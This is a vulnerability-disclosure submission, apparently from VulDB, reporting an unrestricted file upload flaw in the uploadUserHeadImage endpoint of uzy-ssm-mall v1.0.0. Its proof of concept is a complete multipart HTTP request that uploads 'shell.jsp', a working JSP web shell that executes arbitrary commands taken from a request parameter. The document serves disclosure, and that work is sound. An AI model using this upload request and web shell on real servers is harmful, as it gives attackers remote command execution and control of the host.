제출 #549259: ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload정보

제목ghostxbh uzy-ssm-mall v1.0.0 Unrestricted Upload
설명Vulnerability Description In the uzy-ssm-mall v1.0.0 system, the /mall/user/uploadUserHeadImage interface has an arbitrary file upload vulnerability. Attackers can exploit this vulnerability to upload malicious files, thereby gaining server privileges. Vulnerability Location The vulnerability is located at the /mall/user/uploadUserHeadImage interface. Code Audit Process Vulnerability File Path / File Name: /mall/user/uploadUserHeadImage Cause of the Vulnerability: The code does not perform any validation on the uploaded files, allowing attackers to upload arbitrary files. Additionally, the system returns the filename of the uploaded file, which provides further convenience for attackers to exploit. Code Analysis: The code calls getUserId in multiple places to obtain the user's userid and uses userid for related CRUD operations. appid and mailid can be forged through enumeration, further increasing the exploitability of the vulnerability. POC: POST /mall/user/uploadUserHeadImage HTTP/1.1 Host: target-ip Cookie: [users'Cookie] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null) { out.println(line); } %> ------WebKitFormBoundary7MA4YWxkTrZu0gW--
원천⚠️ https://wiki.shikangsi.com/post/share/2f5fafb5-63d3-4784-8866-5592547a71a4
사용자
 XingYue_Mstir (UID 72225)
제출2025. 04. 02. AM 11:54 (1 년도 ago)
모더레이션2025. 04. 14. AM 12:36 (12 days later)
상태수락
VulDB 항목304599 [ghostxbh uzy-ssm-mall 1.0.0 uploadUserHeadImage 파일 권한 상승]
포인트들20

이전개요다음

Want to stay up to date on a daily basis?

Enable the mail alert feature now!